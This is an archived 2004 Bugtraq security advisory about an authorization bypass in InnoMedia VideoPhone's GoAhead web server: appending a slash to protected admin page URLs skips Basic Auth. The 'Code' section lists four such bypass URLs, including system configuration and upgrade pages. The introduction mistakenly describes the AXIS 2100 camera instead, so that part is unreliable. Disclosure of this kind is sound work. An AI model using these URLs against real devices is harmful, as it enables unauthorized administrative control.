lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 28 Feb 2004 14:27:49 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Cc: "SecurITeam News" <news@...uriteam.com>,
	"securitytracker" <bugs@...uritytracker.com>
Subject: InnoMedia VideoPhone Authorization Bypass


#######################################################################

Application:   InnoMedia VideoPhone
Server:            GoAhead-Webs
Vendors:         InnoMedia Pte Ltd
                         GoAhead Ltd
                         http://www.innomedia.com/
                         http://www.goahead.com/
Versions:        au75200xvi04010x
Platforms:       Windows
Bug:                Authorization Bypass
Risk:                High
Exploitation:   remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@...l.com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bugs
3) The Code

#######################################################################

===============
1) Introduction
===============

The AXIS 2100 Network Camera offers crisp, quality images and streaming
video
from anywhere on your network. It lets you keep a close eye on the world
around
you, or show your part of it through the Web.

With a built-in high performance Web server, no PC is required. The network
camera
can operate as a standalone or be placed wherever there is a LAN or Internet
connection,
or an available modem.

#######################################################################

======
2) Bug
======

Browsing the server normally
http://<host>/
Will show some info about the server.
The server's menu appears on the left side and contains a few links
to protected files, which setup the server's settings/configuration.
When refering to any of the menu's "protected" links, such as:
http://<host>/videophone_admindetail.asp
A "Basic Authorization" request pops up.
This authorization can be easily bypassed by refering to the same file as a
folder.
http://<host>/videophone_admindetail.asp/

#######################################################################

===========
3) The Code
===========

http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
http://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Powered by blists - more mailing lists